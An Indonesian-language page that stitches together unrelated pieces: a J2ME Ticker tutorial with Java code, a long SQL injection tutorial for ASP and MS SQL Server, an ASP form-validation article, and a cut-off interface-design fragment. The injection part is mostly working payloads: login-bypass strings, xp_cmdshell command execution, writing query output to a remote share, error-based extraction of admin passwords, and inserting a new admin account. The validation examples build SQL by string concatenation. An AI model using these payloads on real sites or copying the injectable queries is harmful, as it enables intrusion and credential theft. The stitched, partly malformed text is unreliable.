Class Ticker tampak seperti animasi teks berjalan terus menerus dari kanan ke  kiri. Untuk menampilkan obyek Ticker yang telah dibuat, kita perlu memanggil method setTicker() yang didefinisikan pada class Displayable. Ini artinya, method tersebut dapat kita panggil dari obyek turunan dari kelas Screen maupun Canvas.

Pada modul ini akan mengekplorasi ticker. Disini akan membuat obyek Ticker dan mengkaitkannya dengan obyek Form.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36

import javax.microedition.midlet.*;
import javax.microedition.lcdui.*;
 
public class MIDTicker extends MIDlet implements CommandListener {
	private Form form;
	private Display display;
	private Ticker ticker;
	private Command cmdKeluar;
 
	public MIDTicker() {
		cmdKeluar = new Command("Keluar", Command.EXIT, 1);
		ticker = new Ticker("Saham TELKOM naik 10 point");
		form = new Form("Ticker");
		form.setTicker(ticker);
		form.addCommand(cmdKeluar);
		form.setCommandListener(this);
	}
 
	public void startApp() {
		display = Display.getDisplay(this);
		display.setCurrent(form);
	}
 
	public void pauseApp() {
	}
 
	public void destroyApp(boolean unconditional) {
	}
 
	public void commandAction(Command c, Displayable d) {
		if (c == cmdKeluar) {
			destroyApp(false);
			notifyDestroyed();
		}
	}
}

Berikut keterangan kode program di atas:

Untuk membuat objek ticker digunakan baris berikut :

ticker = new Ticker("Ini text berjalan yang akan ditampilan pada layar ");

Sedangkan untuk menambahkan objek ticker pada form digunakan method setTicker(objekTicker), seperti di bawah ini :

form.setTicker(ticker);

Berbeda pada ponsel lainnya, pada Siemens, teks dari objek ticker menempati baris sama dengan title dari form. Selain itu, teks pada objek ticker hanya berjalan setelah layar saja.

1.1.    Setting Teks pada Ticker

Pada class Ticker terdapat dua method yaitu getString() dan setString(String str). Berikut adalah contoh untuk aplikasi yang memberikan fasilitas bagi user untuk mengubah teks yang ditampilkan oleh objek ticker. Berikut adalah contoh dari aplikasi tersebut. Aplikasi ini dapat memodifikasi aplikasi ticker sebelumnya.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45

import javax.microedition.midlet.*;
import javax.microedition.lcdui.*;
 
public class MIDTickerLanjut extends MIDlet implements CommandListener {
	private Form form;
	private Display display;
	private Ticker ticker;
	private Command cmdKeluar;
	private Command cmdTicker;
	private TextField textField;
 
	public MIDTickerLanjut() {
		cmdKeluar = new Command("Keluar", Command.EXIT, 1);
		cmdTicker = new Command("Set Ticker", Command.SCREEN, 2);
		textField = new TextField("Teks : ", "", 50, TextField.ANY);
		ticker = new Ticker("");
		form = new Form("Ticker");
		form.append(textField);
		form.addCommand(cmdKeluar);
		form.addCommand(cmdTicker);
		form.setCommandListener(this);
	}
 
	public void startApp() {
		display = Display.getDisplay(this);
		display.setCurrent(form);
	}
 
	public void pauseApp() {
	}
 
	public void destroyApp(boolean unconditional) {
	}
 
	public void commandAction(Command c, Displayable d) {
		if (c == cmdKeluar) {
			destroyApp(false);
			notifyDestroyed();
		}
		if (c == cmdTicker) {
			form.setTicker(ticker);
			ticker.setString(textField.getString());
		}
	}
}

Aplikasi ini merupakan hasil modifikasi dari MIDTickerLanjut.java. Objek yang ditambahkan adalah objek textField yang akan digunakan oleh user untuk memasukkan teks yang akan digunakan oleh objek ticker. Pada konstruktor hanya dilakukan pembuatan objek ticker dan belum ditambahkan pada objek form. Setelah “tombol” Ticker ditekan baru objek ticker ditambahkan pada form dengan baris seperti berikut ini:

if (c == cmdTicker) {
  form.setTicker(ticker);
  ticker.setString(textField.getString());
}

Untuk menampilkan teks yang diisikan user pada textField digunakan baris berikut:

ticker.setString(textField.getString());

Ketika mesin server hanya port 80 yang dibuka, kita mempunyai keyakinan bahwa tidak akan menghasilkan sesuatu yang bermanfaat yang dapat digunakan untuk menyerang, admin juga beranggapan hanya degan mem-patch servernya dianggap aman. Jika anggapan itu terus dipakai berarti kita “menekan tombol” untuk membuka hacker masuk.

SQL Injection adalah salah satu tipe meng-hack yang hanya membutuhkan port 80 dan tidak memerlukan port lain. SQL injection akan menyerang aplikasi web yang berbasiskan side-server scripting seperti ASP, JSP, PHP, CGI, dan yang mirip dengan itu. Pada artikel ini kita tidak akan membahas hal yang paling baru tentang SQL Injection, karena motode dan trik SQL Injection terus berkembang.

Sebelum anda membaca lebih lanjut, anda harus mnegetahui terlebih dahulu bagaimana database bekerja dan bagaimana SQL digunakan untuk mengaksesnya.

1.1 Apakah SQL Injection ?

SQL Injection adalah sebuah teknik untuk mengeksporasi aplikasi web dengan memanfaatkan suplai data dari client dalam sintak SQL. Banyak halaman web memakai parameter dari web user untuk menggunakan query ke dalam database. Kita ambil sebagai contoh ketika user akan login, halaman user akan mengirim user dan login sebagai parameter untuk digunakan sebagai SQL dan mencek apakah user dan password cocok. Dengan SQL Injection ini sangat mungkin untuk kita mengirim user nama dan password dan dianggap benar.

Walaupun mudah untuk menandai dan melindungi model serangan ini, tapi cukup mengherankan banyak aplikasi web yang terserang dengan metode ini. Pada pembahasan selanjutnya dicontohkan ketika memakai web server IIS dan Microsoft SQL Server untuk databasenya, sedangkan skrip yang dipakai adalah ASP.

1.3 Apa yang diperlukan

Untuk keperluan SQL Injection kita hanya membutuhkan browser. Browser yang dipakai adalah segala macam browser.

2.1 Apa yang perlu di cari ?

Kita dapat memanfaatkan halaman-halaman web yang terdapat submit data, contoh: halaman login, pencarian, feedback, dan lain-lain. Kadang halaman HTML menggunakan metode POST untuk mengirim parameter ke halaman web yang lain. Jika model halamnnya seperti ini maka kita harus melihat source code karena kita tidak dapat melihat pada URL. Mudah untuk mencek source code halaman HTML, tinggal klik kanan pilih view source (pada Internet Exlorer), kemudian cari kode “FORM”. Berikut contoh halaman tersebut:

<FORM action=search.asp method=post>
<input value=andi>
</FORM>

Semua yang terletak diantara <FORM> dan </FORM> mempunyai potensial untuk digunakan mengekplorasi halaman web tersebut. Karena itu dapat menjadi sebuah parameter. Halaman diatas berarti akan mengrimkan parameter bernama “login” dengan nilai (value)=”andi”.

2.2 Bagaimana jika tidak bukan halaman input ?

Jika halaman bukan berbentuk form input, maka anda harus cari halaman yang di buat dengan bahasa pemrograman internet seperti ASP, JSP, CGI or PHP, kemudian cari spesial URL seperti http://www.myandisun.com/profile.asp?id=10. Ini berarti halaman web ASP dengan parameter “id” yang bernilai “10”.

2.3   Bagaimana cara mengetes suatu halaman web mudah diserang?

Dimulai dari pengunaan single quote. Seperti masukan:

hi or 1=1--

Dalam login, password, atau URL lain. Contoh:

 - Login: hi' or 1=1--

 - Pass: hi' or 1=1--

 - http://www.myandisun.com/profil.asp?id=10id=hi' or 1=1--

Jika halaman dalam bentuk ada field yang bertipe hidden, anda tinggal download kode HTML dari situs yang anda buka ke hard disk anda, di modifikasi sedikit kemudian di simpan dalam hard disk dan modifikasi URL, seperi contoh berikut:
Skrip awal:

<FORM action=search.asp method=post>
 <input value=t610 >
</FORM>

Setelah di modifikasi:

<FORM action=http://www.myandisun.com/search.asp method=post>
<input value=t610>
</FORM>

Jika anda beruntung maka dengan cara seperti itu anda dapat masuk ke halaman web tanpa harus mengisikan login name dan password yang benar.

3.1 Kenapa Harus ‘ or 1=1–

Kita akan ekplorasi pentingnya 1=1 — dan apakah memperoleh informasi yang tidak normal (diberikan kepada user biasa) dari sebuah web site. Kita ambil halaman asp yang di link ke halaman lain seperti URL berikut:

http://www.myandisun.com/barang.asp?category=food

Dalam URL diatas, “category” adalah nama variabel sedangkan “food” adalah nilai yang diberikan pada variabel tersebut. Untuk dapat mengambil nilai dari variabel diatas berikut code program pada file barang.asp.

v_cat = request("category")
sqlstr="SELECT * FROM product WHERE PCategory='" & v_cat & "'"
set rs=conn.execute(sqlstr)

seperti kita lihat pada contoh diatas variabel kita bungkus dan diberi nama “v_cat” dan SQL menjadi:

SELECT * FROM product WHERE PCategory='food'

Pada query diatas menghasilkan ini satu atau beberapa baris yang cocok untuk kondisi dimana (WHERE) kondisinya adalah ‘food’.

Sekarang kita asumsikan URL diatas kita ganti menjadi seperti ini:

http://www.myandisun.com/barang.asp?category=food' or 1=1--

Sekarang variabel “v_cat” kita menjadi “foot’ or 1=1—“, jika masukkan ke query maka:

SELECT * FROM product WHERE PCategory='food' or 1=1--'

Query diatas berarti menampilkan semua dari tabel product dengan “Pcategory” sama dengan ‘food’ atau tidak. Sedangkan double dash “–“ menyatakan pada SQL server untuk mengabaikan kesalahan query, yang akan membersihkan single quote yang terakhir. Kadang kita dapat menggenti double quote dengan has tunggal “#”.

Jika cara diatas tidak dapat mennyebabkan SQL server mengabaikan kesalahan query anda dapat mencoba.

' or 'a'='a

Sehingga query akan menjadi:

SELECT * FROM product WHERE PCategory='food' or 'a'='a'

Itu seharusnya akan menghasilkan hasil yang sama.

Tergantung pada peraturan Query, dapat dicoba dengan beberapa alternatif yang mungkin:

' or 1=1--

 " or 1=1--

 or 1=1--

 ' or 'a'='a

 " or "a"="a

 ') or ('a'='a

4.0  Bagaimana mengeksekusi jarak jauh dengan SQL Injection?

Melakukan perintah injeksi SQL berarti kita dapat mengeksekusi perintah SQL. Secara default Microsoft SQL Server running sebagai SYSTEM, yang berarti sama dengan Administrator mengakses Windows. Kita dapat menggunakan store procedure seperti master..xp_cmdshell untuk melakukan remote exucution:

'; exec master..xp_cmdshell 'ping 10.10.1.2'--

Dapat dicoba menggunakan double quote (“) jika single quote (‘) tidak berjalan.

Semi colon digunakan untuk mengakhiri query, jadi setelah semicolon kita membolehkan untuk memulai perintah SQL baru. Untuk menguji perintah diatas di eksekusi dengan sukses, anda dapat memperoleh informasi dari paket ICMP dari 10.10.1.2,  yang akan mencek setiap paket dari server.

 #tcpdump icmp

Jika tidak mendapatkan perintah request ping dari server, dan pesan error yang mengidikasikan kesalahan permission, ini juga berarti administrator membatasi akses Web User untuk menakses store procedure tersebut.

5.0 Bagaimana memperoleh output dari SQL Query kita ?

Kita bisa menggunakan sp_makewebtask untuk menuliskan wuery dalam HTML.

'; EXEC master..sp_makewebtask "\\10.10.1.3\share\output.html", "SELECT * FROM INFORMATION_SCHEMA.TABLES"

Dengan syarat target IP harus berupa folder “share” yang di sharing untuk semuanya user.

6.0  Bagaimana memperoleh data dari pesan kesalahan database ?

Kita dapat menggunakan informasi pesan kesalahan yang di keluarkan oleh MS SQL Server untuk mendapatkan sebagian data yang kita perlukan.

http://www.myandisun.com/barang.asp?id=10

Kita akan mencoba UNION integer ‘10’ dengan string dari database:

 http://www.myandisun.com/barang.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--

Tabel system INFORMATION_SCHEMA.TABLES berisi informasi semua tabel di dalam server. Pada TABLE_NAME fieldnya berisi dengan jelas nama masing-masing tabel dalam database. Itu kita pilih karena pasti ada dalam sebuah database dalam SQL Server, query nya adalah:

SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES-

Query diatas akan mengembalikan tabel pertama dalam database. Ketika kita UNION nilai string dengan integer 10, MS-SQL Server mencoba menkonversi string (nvarchar) menjadi integer.  Ini akan menghasilkan error, ketika kita tidak bisa mengkonversi dari string (nvarchar) to int, server akan menampilkan pesan kesalahan.

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
 [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'table1' to a column of data type int.
 /barang.asp, line 5

Error ini bagus buat kita dan cukup untuk mengatakan pada kita ada nilai yang tidak dapat di konversi menjadi integer. Dalam kasus ini, kita memperoleh tabel pertama di dalam database, yang namanya “tabel1”.

Untuk dapat menampilkan nama tabel yang lain, kita dapat mengikuti query berikut:

 http://www.myandisun.com/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN ('table1')--

Kita juga dapat mencari data mengunakan keyword LIKE.

 http://www.myandisun.com/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME LIKE '%25login%25'--

Hasil:

 Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
 [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'admin_login' to a column of data type int.
 /index.asp, line 5

Jika kita lihat syntax ini sama antara ‘%25login%25′ dan %login% dalam SQL Server. Dalam kasus ini, kita akan mendapatkan nama tabel pertama yang cocok untuk criteria “admin_login”.

6.1 Bagaimana mendapatkan semua nama kolom dalam tabel ?

Kita dapat menggunakan kegunaan lain dari tabel INFORMATION_SCHEMA.COLUMNS untuk memetakan nama kolom dalam sebuah tabel dalam database.

http://duck/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login'--

Hasil:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'login_id' to a column of data type int.
/index.asp, line 5

Jika sekarang yang kita punya adalah colum nama pertama, kita dapat menggunakan NOT IN () untuk mendapatkan nama kolom berikutnya.

http://www.myandisun.com/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login' WHERE COLUMN_NAME NOT IN ('login_id')--

Hasil:

 Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
 [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'login_name' to a column of data type int.
 /index.asp, line 5

Ketika kita meneruskan lebih lanjut, kita memperoleh sisa (rest) nama kolom yang lain, seperti contoh: “password”, “detail”. Kita tahu ini ketika kita memperoleh pesan kesalahan.

http://duck/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login' WHERE COLUMN_NAME NOT IN ('login_id','login_name','password',details')--

Hasil:

 Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
 [Microsoft][ODBC SQL Server Driver][SQL Server]ORDER BY items must appear in the select list if the statement contains a UNION operator.
 /index.asp, line 5

6.2 Bagaimana mendapatkan kembali data yang kita perlukan ?

Sekarang kita sudah menidentifikasi beberapa tabel yang penting, dan nama kolomnya, kita dapat menggunakan teknik yang sama untuk informasi lebih lanjut yang kita inginkan dari database.

Sekarang, kita lihat login_name yang pertama dari tabel “admin_login”:

http://www.myandisun.com/index.asp?id=10 UNION SELECT TOP 1 login_name FROM admin_login--

Hasil:

 Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
 [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'neo' to a column of data type int.
 /index.asp, line 5

Kita tahu ada admin user dengan login name “neo”. Akhirnya mendapatkan password dari “neo” dari database.

http://www.myandisun.com/index.asp?id=10 UNION SELECT TOP 1 password FROM admin_login where login_name='neo'--

Hasil:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
 [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'm4trix' to a column of data type int.
 /index.asp, line 5

Sekarang kita dapat login sebagai “neo” dengan menggunakan password “m4trix”.

6.3 Bagaimana mendapatkan niilai numeric string ?

Ada batasan teknik untuk menerangkan hal diatas. Kita tidak dapat mendapatkan pesan error jika kita mencoba menkonversi text yang terdiri dari valid number (carakter antara 0-9 saja). Kita coba mendapatkan password dari “trinity” yang “31173”.

http://www.myandisun.com/index.asp?id=10 UNION SELECT TOP 1 password FROM admin_login where login_name='trinity'--

Kita mungkin akan mendapatkan sebuah halaman “Page Not Found” error. Ini karena password “31173” akan di konversi menjadi number, sebelum UNION dengan integer (10 dalam kasus ini). Selama statement UNION valid, SQL Sqerver tidak akan melemparkan pesan kesalahan, dan kita tidak akan mendapatkan kembalian data beberapa masukan numeric.

Untuk dapat memecahkan masalah ini, kita dapat menginputkan numeric string dengan beberapa alphabet yang dipastikan gagal untuk di konversi. Kita coba query berikut:

http://www.myandisun.com/index.asp?id=10 UNION SELECT TOP 1 convert(int, password%2b'%20morpheus') FROM admin_login where login_name='trinity'--

Kita dengan mudah menggunakan tanda (+) untuk memasukkan password dengan suatu tek yang kita inginkan. Kode ASSCII untuk ‘+’ =0x2b. kita menambahkan ‘(space)morpheus’ dalam passeord yang sebenarnya.  Oleh karena itu, selama kita mempunyai numeric string ‘31173’, ini akan menjadi ’31173’ morpheus’. Dengan memanggil function convert(), mencoba menkonversi ‘31173 mopheus’ menjadi sebuah integer, SQL Server akan mengeluarkan pesan kesalahan:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
 [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value '31173 morpheus' to a column of data type int.
 /index.asp, line 5

Sekarang, anda dapat login sebagai ‘trinity’ dengan password ’31173′.

7.0 Bagaimana megupdate dan memasukkan data ke dalam database?

Ketka kita sukses mengetahui nama kolom dalam tabel, kita memungkinkan untuk kita meng UPDATE atau melakukan INSERT record baru dalam tabel. Sebagai contoh menganti password “neo”:

 http://www.myandisun.com/index.asp?id=10; UPDATE 'admin_login' SET 'password' = 'newpas5' WHERE login_name='neo'--

Untuk INSERT record baru ke dalam database:

 http://www.myandisun.com/index.asp?id=10; INSERT INTO 'admin_login' ('login_id', 'login_name', 'password', 'details') VALUES (666,'neo2','newpas5','NA')--

Kita dapat login sebagai “neo2” dengan password “newpas5”

8.0 Bagimana menghindari SQL Injection?

Langkah yang dapat di tempuh untuk mengurangi penyusupan ke halaman web dengan SQL Injection dengan cara:

a.  Memfilter dengan tidak membolehkan karakter seperti single quote, double quote, slash, back slash, semi colon, extended character like NULL, carry return, new line, etc, dalam string form:
- Masukan dari from users
- Parameters di URL
- Nilai dari cookie

b.  Untuk nilai numeric, convert dulu sebelum melewati statement SQL dengan mengunakan ISNUMERIC untuk meyakinkan itu adalah integer.

c.  Mengubah  “Startup and run SQL Server” menggunakan low privilege user dalam SQL Server Security tab.

d.  Ubah stored procedure – store procedure yang tidak terpakai, seperti:
master..Xp_cmdshell, xp_startmail, xp_sendmail, sp_makewebtask

Kesimpulan

SQL Injection dapat bekerja hanya dengan menggunakan Port 80. Fasilitas Web Server yang digunakan untuk menampilkan pesan kesalahan dan stored procedure default Microsoft SQL Server dapat di gunakan untuk mengekplorasi halaman web dengan SQL Injection.

Untuk meminimalkan penyusupan ke server Web dan Server Database kita dapat menghapus atau menonaktifkan service dan stored procedure yang tidak diperlukan. Yang paling penting untuk menutup halaman web kita dengan dari serangan dengan motode SQL Injection adalah Validasi input sebelum dikirim ke web server.

Daftar Pustaka:

http://www.wiretrip.net/rfp/p/doc.asp?id=42&iface=6

http://www.blackhat.com/presentations/win-usa-01/Litchfield/BHWin01Litchfield.doc

http://www.owasp.org/asac/input_validation/sql.shtml

http://www.wiretrip.net/rfp/p/doc.asp?id=7&iface=6

http://www.wiretrip.net/rfp/p/doc.asp?id=60&iface=6

http://www.spidynamics.com/whitepapers/WhitepaperSQLInjection.pdf

Abstraksi

Apa yang terjadi jika pada halaman form Anda ada kesalahan pemasukan data atau pengiriman berulang oleh user ke server ? Jika itu adalah masalah Anda maka validasi form adalah jawabannya. Dengan adanya validasi data yang di kirim ke server kita cek dulu kebenarannya.

Kata Kunci: validasi, form, web, klient, server

Pendahuluan

Validasi merupakan proses pengecekan masukan yang dari sebuah form sebelum data tersebut diterima dan diolah untuk keperluan selanjutnya. Hal tersebut dilakukan agar tidak terjadi kesalahan proses karena input tidak sesuai yang tipe data yang dinginkan, inkonsistensi data dan duplikasi data.

Sebelum kita membahas tentang Validasi lebih jauh kita akan membahas dua teknik dalam menulis skrip dalam pemrograman internet yaitu, Server-side dan Client Side

Yang membedakan antara kedua adalah tempat dimana skrip diproses. Pada side server, proses dilakukan di web server, sedangkan klien (web browser) hanya menerima hasil dalam bentuk HTML. Contoh skrip server side adalah CGI/Perl, Active Server Pages (ASP) dan Java Server Pages (JSP). Pada client side proses dilakukan di web browser. Client side biasanya banyak digunakan untuk hal-hal yang membutuhkan banyak interaktif user dan menggunakan jenis informasi yang pasti dan seragam. Contoh skrip Client Side adalah JavaScript, DHTML.

Walaupun seakan-akan keduanya kontradiksi, tapi mereka saling melengkapi. Di sini pihak programmer dituntut untuk bisa menentukan kapan mereka menggunakan server side, client side atau kapan menggabungnya. Server side biasanya digunakan untuk memproses segala sesuatu yang berhubungan dengan server, seperti environmental dari server, memanipulasi data dalam database.

Pada pembahasan kali ini kita akan membahas validasi diaplikasi berbasis Web (Web Base Aplication). Skrip yang menjadi acuan adalah ASP( Active Server Pages) yang selanjutnya penulis sebut ASP. Hal yang penting untuk Web developer adalah mengedepankan dan memprediksi apa yang akan dilakukan oleh user dana apakah mereka merasa sulit dengan aplikasi kita. Jika Anda pernah membuat aplikasi dengan ASP yang menggunakan form, dan ada user mengirim response ada keganjilan terjadi: data terkirim dua kali, data tidak komplit atau user melaporakan form tidak tertampil secara baik. Pada tulisan ini kita akan membahas masalah-masalh tentang validasi.

Pembahasan

a. Validasi TextBox masukan

Validasi ini mengecek nilai yang kita inputkan pada sebuah form masukan.

1. Validasi cek data pada form kosong atau tidak
2. Validasi tipe data yang diminta sama atau tidak
3. Validasi spesial karakter.
4. Validasi range

b. Validasi proses database

1. Validasi untuk pemasukan dalam database.
2. Validasi data dalam database harus isi atau tidak
3. Validasi penghapusan dan pengeditan data yang ensyaratkan data harus ada

c. Validasi pengiriman berulang pada Halaman Web

Proses Validasi

Validasi yang tersebut diatas dapat dilakukan Server dan klien.

Kelebihan dan kelemahan proses.

1. Proses di server (Server Side)

Kelebihan terdapat kepastian proses validasi akan dilaksanakan karena proses server tidak tergantung pada browser yang dipakai. Dapat melakukan validasi proses yang pada Aplication Layer (Web Server) dan Database Layer.

Kelemahan pada proses ini memerlukan waktu yang lama karena data harus dikirim ke server terlebih dulu dan di kirim kon kembali konfirmasinya ke browser

2. Proses Klien (Client Side)

Kelebihan proses di klien adalah proses yang tergolong lebih cepat di banding proses di server. Karena program di eksekusi di client.

Kelemahannya adalah tidak bisa validasi sampai proses database hanya proses pada presentation layer..

Solusi Validasi

a. Validasi Text Box

Pada validasi ini sebagian bisa kita lakukan dengan dua model yang itu validasi di klien dan server.

1. Cek data isi atau tidak

Proses ini dapat dilakukan di klien maupun di server. Contoh kode programnya:

Proses diserver dengan ASP.

<%
nim = request(“data”)
If nim = “” Then
. . . ‘tampilkan pesan data belum diisi
Else
. . . ‘proses selanjutnya valid
End If
%>

Proses di klien dengan bahasa pemrograman JavaScript.

<Script language="javascript">
<!-- Begin
function periksa(frm){
 var err = "";
 if (frm.data.value.length<1)err+="- Data Belum Diisi !\n";
 if (err!=""){alert(\n"+err\n" + “Silakan
 <b>Anda </b> Cek Lagi !");
 window.event.returnValue = false;
 return (false);
 }else {
 frm.submit();}
}
// End -->
</script>

<Html>
 <Head></Head>
 <Body>
 <input type="submit" value="TAMBAH"
 <name="action" onclick="periksa(this.form)">
</Body>
</Html>

2. Validasi tipe data yang diminta sama atau tidak

Masukan dari user sering ada kesalahan sebagai contoh untuk mengisi jumlah haruslah tipe data Numeric. Berikut contoh kode program untuk mengecek masukan apakah bertipe Numeric.

Contoh kode program dengan ASP

<%
If IsNumeric(Request("jumlah")) Then
... 'proses selanjutnya
Else
... 'pesan salah data bukan numeric
End If
%>

3. Validasi spesial karakter

Validasi ini memungkinkan mengecek apakah dalam suatu masukan ada karakter tertentu yang dinginkan. Sebagai contoh sederhana adalah masukan berupa alamat e-mail yang membutuhkan tanda “@”. Berikut contoh programnya.

Contoh kode program dengan ASP

<%
datacek = Request("data")
If IntStr(1,datacek,"@") = 0 Then
. . . 'proses validasi benar
Else
. . . 'pesan salah
End If
%>

4.  Validasi data dengan range tertentu.

Misalnya dalam stok data yang dimasukkan harus >=0.

Contoh kode program dengan ASP

<%
stok = Request(“data”)
If stok < 0 Then
. . . ‘pesan data yang dimasukkan salah
Else
. . . ‘proses jika validasi benar
End If
%>

d. Validasi pada database

Untuk bisa melakukan validasi database request dari klien harus di kirim ke server diolah dan kemudian respon dikirim kembali ke klien.

1. Validasi untuk pemasukan dalam database.

Validasi ini untuk menghindari adanya duplikasi data dalam sebuah database.

Berikut potongan kode program untuk validasi dengan ASP.

<%
. . .
sql = “select * from mhs where nim=’” & txtnim & “’”
Set rs = conn.execute(sql)
If rs.eof Then
. . .’data belum ada proses selanjutnya
Else
. . .’pesan data sudah ada
End If
%>

2.  Validasi data dalam database harus isi atau tidak

Validasi ini bisa kita gabung dengan validasi yang jalan di klien, dengan cek form telah diisi atau belum.

3.  Validasi penghapusan dan pengeditan data yang ensyaratkan data harus ada.

Pada proses penghapusan dan edit data data harus sudah ada dalam database. Berikut contoh program denagn ASP.

<%
. . .
sql = “select * from mhs where nim=’” & txtnim & “’”
Set rs = conn.execute(sql)
If rs.eof Then
. . .’data tidak ada
Else
. . .’proses jika validasi benar
End If
%>

c. Validasi duplikasi pengiriman data

Secara kebetulan pengiriman data berulang sering terjadi, dan itu akan menimbulkan masalah untuk pengoahan data selanjutnya. Idealnya user asuk ke form dalam sebuah Web site, mengisi form yang telah disediakan dan klik men-submit ke server untuk diproses di server dan mengirim kembali ke user sebagai konfirmasi dari respon yang dikirimnya.

Bagaimana jika user klik tombol Back pada Browser dan tanpa disengaja mengirim data yang sama ? Jika anda tidak mengantisipasi hal tersebut data akan dikirim dan diolah diserver berulang. Untuk mengantisipasi kesalahan terkirim dua kali ke server, Anda dapat memuat validasi cek dengan server side untuk memastikan bahwa user mengetahui dia mengirim data dua kali.

Cara yang pertama adalh untuk memastikan user tidak mengirim informasi yang sama dua kali, kita memerlukan indikasi bahwa data sudah diterima olah server. Cara yang tepat adalah kita menggunakan session variabel. Anda dapat mendefinisikan variabel session dengan Session(“submiited”) diinisialisasi False untuk pertama kali dan pernyataan True jika user sudah mengirim datanya. Pesan ketika data dikirim dua kali.

Halaman ASP yang untuk membuat form dan mencek data yang sudah terkirim (form.asp) Potongan kode program untuk situasi ini adalh sebagi berikut sebagai berikut:

...
<% If Session(“submitted”) Then %>
<!—- ada pesan warning -->
...
<% Else %>
<-- kode menampilkan form -->
...
<% End If %>
...

Di halaman yang menerima pesan kode program adalah sebagi berikut:

Anda mengirim informasi:

<p>
<%=request(“data”)%>
<%Session(“submitted”) = True%>

Cara kedua jika form memerlukan banyak data sebagai masukan lebih baik anda memotong untuk kerperluan menjadi form yang lebih kecil, yang mamandu user memulai sesuatu langkah demi langkah tanpa harus menunggu lama untuk meload control atau halaman pengisian yang banyak. Lebih dari itu jika ada data yang tidak perlu dimasukkan maka tidak usah ditampilkan, misalnya tanggal sekarang , jam sekarang, karena bisa siambil dari server.

Untuk mencegah masalah tersebut, anda dapat meset status data yang dimasukkan. Status dapat menggunakan session variabel apakah record tersebut sudah dimasukkan user atau belum.

Ini bisa menggunakan Session bertipe Boolean untuk masing-masing form dalam multi-step form. Variabel bernilai False jika diasosiasikan form belum diproses dan True adalah sebaliknya.

Contoh kedua tentang aplikasi untuk download biasanya dibagi menjadi dua langkah yaitu: form pertama memmerlukan konfirmasi username dan form kedua menampilkan ComboBox berisi daftar item tergantung user yang disediakan.

Form pertama mempunyai session variabel requested1, dan requested2 untuk form yang kedua. Ketika user mengirim form pertama (form1.asp) session variabel requested1 diset dengan True:

<Form Method=”post” Action=”form2.asp”>
Your Name:
<Input Type=”text” Name=”name”>
<p>
<Input Type=”submit” Value=”Submit”>
<Input Type=”reset” Value=”Cancel”>
</Form>
<%
Session(“requested1”)=True
%>

Ini akan mencek dan memutuskan apakah masukan sudah cukup atau belum. Tentu saja, ketika user sebelum user masuk ke request yang kedua (form2.asp) harus cek dulu form ayng dikirim pada form sebelumnya.

Jika reques pada form1.asp True, form kedua akan di kirim ke browser dan session veriabel requesed2 di set True. Nilai False pada session variabel berarti user mencoba mengakses langsung ke form yang kedua, sehingga browser langsung dipindahkan ke form pertama.

Kode program untuk form yang kedua adalah sebagai berikut:

<% If Session(“requested1”) Then %>
<Html>
<Head>
</Head>
<Body>
. . . ‘kode program untuk form kedua
<% Session(“requested2”) True
Else
Response.Redirect “form1.asp”
End If %>
</Body>
</Html>

Catatan, tes pada variabel session requested1 harus dilaksanakan sebelum Tag <Html> untuk mengijinkan kemungkinan redirect. Dalam kenyataan bahwa redirect adalah instruksi browser dan hal tersebut tampak pada HTTP header sebelum kode HTML.

Kesimpulan

Teknik validasi merupakan upaya agar data yang dimasukkan sesuai dengan keinginan programmer, agar pengolahan selanjutnya tidak terjadi masalah. Teknik-teknik diatas untuk situasi tertentu. Masing-masing teknik menyelesaikan satu masalah yang spesifik, sehingga masalah kemungkinan digabung juga ada, dan mungkin kita tidak hanya menggunakan dua Session Variabel tapi bisa lebih. Teknik menggabungkan pengecekan di server dan di klien adalah yang terbaik, karena untuk bisa menutupi kelemahan masing-masing teknik.

Daftar Pustaka

• Alex, Homer. Sussman, Dave. Francis, Brian. 1999. Profesional Active Server Pages 3.0. Wrox Press Ltd.
• www.asptoday.com

Pembahasan
Elemen Antar Muka
Beberapa elemen digunakan dalam banyak implementasi. Jika elemen dalam antar muka digunakan dengan tepat, akan membantu membuat efisiensi dan produktivitas untuk penguna nantinya. Meskipun elemen itu memiliki banyak perbedaan untuk software aplikasi dan berbasis web, semua fungsinya mirip di lingkungan masing-masing.

Bentuk Desain Antar Muka
Dalam aplikasi berbasis windows, tidak semua sama, ada tiga bentuk utama:
